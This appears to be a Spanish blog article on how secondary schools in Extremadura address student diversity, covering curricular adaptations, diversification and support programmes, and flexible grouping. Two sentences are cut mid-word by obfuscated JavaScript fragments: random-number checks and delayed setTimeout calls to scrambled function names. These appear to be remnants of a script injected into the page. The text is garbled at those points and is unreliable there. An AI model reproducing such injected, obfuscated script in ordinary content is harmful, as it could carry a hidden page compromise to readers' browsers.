SOMOS DIFERENTES, PERO IGUALES EN LA EDUCACIÓN

Autora: Ana María Vega Llano            

Hoy en día nos encontramos en las aulas con alumnos que requieren una atención educativa diferente a la ordinaria por presentar necesidades educativas especiales, por sus altas capacidades intelectuales, por haberse incorporado tardíamente al sistema educativo o por condiciones personales o de historia escolar. Así, lo principal será actuar pedagógicamente en consecuencia, y toda la metodología se adaptará lo máximo posible a esa realidad. Ante esta diversidad de intereses, el centro dispone de una serie de vías para el tratamiento de la diversidad.

La atención a la diversidad tiene sentido desde el momento en que la escolarización es obligatoria hasta los 16 años. De hecho, ya desde el propio currículo extremeño se nos insta a atender a toda la diversidad existente en los centros para dar respuesta a las necesidades educativas del alumnado. Se apuesta, por tanto, por una formación diversa que atienda a todos los alumnos en general y, a los ACNEAE (alumnos con necesidades específicas de apoyo educativo) en particular.

A la hora de obtener un buen conocimiento de esa diversidad se realiza una buena y temprana evaluación inicial en conjunto y con total consenso con el Departamento de Orientación de nuestra área (en este caso de Lengua Castellana y Literatura). Además, para obtener más información de estos alumnos, será fundamental que el Departamento de Orientación y la Jefatura de Estudios aporten informes acerca de los ya diagnosticados.

Una vez obtenido ese mapa de diversidad, se debe actuar pedagógicamente en consecuencia, y toda la metodología se adaptará lo máximo posible a esa realidad. A partir de aquí, hay que conocer a estos alumnos y averiguar qué es lo que crea diversidad. Todos ellos serán ACNEAE, es decir, alumnos que requieren una atención educativa diferente a la ordinaria por presentar necesidades educativas especiales, por sus altas capacidades intelectuales, por haberse incorporado tardíamente al sistema educativo o por condiciones personales o de historia escolar.

Una vez visto esto, y teniendo en cuenta que el sistema educativo es integrador, las soluciones de tratamiento educativo que se aportan deben ser simultáneas al desarrollo normal de la clase.

La Educación Secundaria Obligatoria es una etapa en donde los intereses de los alumnos se diversifican, por eso desde el centro se da igualdad de oportunidades para satisfacer los intereses de los alumnos, y uno de los objetivos es que el alumno sea autónomo. Ante esta diversidad de intereses, el centro dispone de una serie de vías para el tratamiento de la diversidad:

- El espacio de opcionalidad: se trata de que, ante la diversidad de intereses de los alumnos, existan optativas para complementar su formación. Es la posibilidad de desarrollar las mismas capacidades que el resto de los compañeros (que vienen prescritas por los objetivos generales de la etapa marcados para el curso) y están relacionadas con las competencias básicas.

- Otra medida específica de tratamiento de la diversidad, y la principal, es la relacionada con las adaptaciones curriculares no significativas y las significativas. Las primeras se aconsejan cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las dificultades de aprendizaje no son muy importantes; y las segundas, precisan de una adecuación de los objetivos educativos, y de una modificación del currículo y de los criterios de evaluación.

-Otra de las vías para atender a la diversidad es el Programa de Diversificación. Se aplica a partir de 3º de la ESO, el alumno debe tener cumplidos los 16 años y haber repetido, al menos, una vez en 1º o en 2º de la ESO.

-  Y otras vías para la atención a la diversidad son: Compensatoria, PCPI (Programa de Cualificación Profesional Inicial), PROA (Programa de Refuerzo y Orientación Académica) o el PEREX, también una medida de refuerzo y atención a la diversidad.

Además, un aspecto organizativo que no hemos de olvidar en la atención a la diversidad es el agrupamiento. La razón es que hay alumnos con un aprendizaje más rápido que otros, o con ciertas carencias auditivas o visuales, y en estos casos se tendrá en cuenta el agrupamiento, que deberá ser flexible, además de fomentar el aprendizaje cooperativo. Por tanto, según este aspecto y el ritmo de aprendizaje, se adaptará la metodología elaborandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando actividades de refuerzo o ampliación.

Y, a la hora de hablar de integración, no podemos olvidarnos de los alumnos con problemas de comportamiento, hiperactividad, rebeldía y con faltas de interés que boicotean el proceso de enseñanza. Son alumnos que, además de molestar, no hacen nada (alumnos pasivos) y la mayoría de las veces el profesor no sabe cómo actuar.

Así que, diversidad sí (porque todos somos diferentes), pero igualdad también en lo referente a la educación.

BIBLIOGRAFÍA:

- Ley Orgánica 2/2006, de 3 de mayo, de Educación (LOE) (BOE núm. 106, 04-05-2006).

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.